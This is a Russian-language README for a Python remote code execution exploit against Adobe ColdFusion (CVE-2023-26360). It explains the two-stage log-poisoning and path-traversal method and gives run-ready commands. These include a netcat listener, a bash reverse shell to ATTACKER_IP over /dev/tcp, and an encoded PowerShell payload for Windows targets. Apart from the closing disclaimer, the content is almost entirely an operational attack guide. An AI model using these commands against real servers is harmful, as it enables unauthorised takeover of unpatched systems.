
Этот эксплойт основан на CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) и создан на основе модуля Metasploit и jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit.
Реализация эксплойта для удаленного выполнения кода для CVE-2023-26360 на Python, основанная на анализе оригинального модуля Metasploit и предыдущей работы jakabakos.
PoC от jakabakos пытается внедрить <cfexecute> непосредственно в параметр _variables и прочитать вывод из журнала ColdFusion за один шаг. Этот подход не работает, поскольку ColdFusion не вычисляет теги CFML в таком контексте, что приводит к ошибке 500 и отсутствию выполнения кода.
Эта реализация повторяет правильный двухэтапный механизм, используемый модулем Metasploit:
_variables ({<cftry>CFML</cftry>) на уязвимую конечную точку CFC. ColdFusion не может обработать ее и записывает необработанный контент, включая код CFML, в .coldfusion-out.logВыполнение команд осуществляется через java.lang.Runtime.exec() с помощью createObject, что позволяет избежать зависимости от <cfexecute>, который обычно отключен в усиленных или производственных средах.
pip install -r requirements.txt
Запустите слушатель перед выполнением эксплойта:
nc -lvnp 4444
Цель Windows:
python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"
Цель Linux:
python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
Через прокси (например, Burp Suite):
python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080
| Flag | Description |
|---|---|
--host | Базовый URL цели (например, http://192.168.1.10:8500) |
--cmd | Команда для выполнения на цели |
--win | Установите этот флаг, если цель — хост Windows |
--proxy | Опциональный URL HTTP-прокси |
┌─────────────┐ Step 1: plant CFML ┌──────────────────┐
│ Attacker │ ──── POST /_variables={<cftry>... ──► iedit.cfc │
│ │ CF fails to parse, logs CFML │ │
│ │ │ coldfusion- │
│ │ Step 2: trigger execution │ out.log │
│ │ ──── POST classname=X..\logs\cf... ──► (loaded as │
│ │ │ CFML template) │
│ Listener │ ◄─────────────── reverse shell ───────│ │
└─────────────┘ └──────────────────┘
Этот инструмент предоставляется только в образовательных целях и для авторизованных оценок безопасности (пентесты, CTF, лабораторные среды). Запуск этого эксплойта против систем без явного письменного разрешения является незаконным. Автор не несет ответственности за любое неправомерное использование.